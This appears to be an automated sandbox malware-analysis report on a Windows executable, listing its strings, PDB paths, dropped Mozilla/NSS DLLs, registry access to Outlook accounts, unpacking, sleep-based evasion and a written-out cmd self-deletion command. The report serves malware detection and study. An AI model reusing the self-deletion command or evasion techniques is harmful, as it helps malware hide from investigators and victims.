Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Command line argument: NaF 0_2_004660A0
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Tk6dsSEyOC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00466770 push eax; ret 0_2_0046678E
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004667E0 push eax; ret 0_2_004667C5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0046678F push eax; ret 0_2_004667C5
PE file contains sections with non-standard names
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr Static PE information: section name: .orpc
Source: mozglue.dll.0.dr Static PE information: section name: .didat
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_004333DD
Binary contains a suspicious time stamp
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: 0x9F27750A [Wed Aug 12 16:00:10 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.95634126707

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe" Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041DD0B
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe TID: 6116 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4396 Thread sleep count: 87 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
